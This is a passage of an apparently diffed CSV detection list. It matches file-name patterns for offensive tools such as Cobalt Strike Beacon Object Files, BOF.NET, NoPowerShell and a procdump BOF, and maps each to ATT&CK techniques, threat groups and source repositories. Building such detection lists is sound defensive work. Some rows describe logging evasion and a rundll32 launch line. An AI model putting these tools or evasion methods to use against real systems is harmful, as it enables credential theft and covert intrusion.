T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*BOF/*procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*BOF/*procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*bof_allocator*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bof_helper.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","198","44","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" "*bof_net_user.c*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 
- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" 
@@ -7882,21 +8029,21 @@ "*BofLdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*bofloader.bin*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*BOFMask-main*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" -"*bofnet*SeriousSam.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*bofnet*SeriousSam.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOFNET.Bofs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet.cna*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*BOFNET.csproj*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*BOFNET.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*BOFNET.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*BOFNET.sln*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_boo *.boo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_execute *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet_execute *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*bofnet_execute.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - 
